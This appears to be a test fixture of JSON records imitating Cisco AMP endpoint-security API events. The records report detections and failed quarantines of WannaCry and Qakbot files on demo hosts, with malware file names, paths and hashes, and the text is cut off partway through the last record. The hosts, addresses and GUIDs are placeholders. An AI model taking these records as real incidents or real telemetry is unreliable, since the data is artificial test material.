+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239046651838000,"timestamp":1610637527,"timestamp_nanoseconds":932000000,"date":"2021-01-14T15:18:47+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492807649948000000,"timestamp":1610635719,"timestamp_nanoseconds":948000000,"date":"2021-01-14T14:48:39+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610635719,"start_date":"2021-01-14T14:48:39+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Unknown","file_name":"yuyfhonu.exe","file_path":"/C:/Users/johndoe/AppData/Roaming/Microsoft/Yuyfhonuu/yuyfhonu.exe","identity":{"sha256":"6b7d5fdf4b9d42a985cf861c5ef28f5fa914b418c22e4bf5b56bac12251bcd6c"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":664000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":430000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":102000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":102000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine 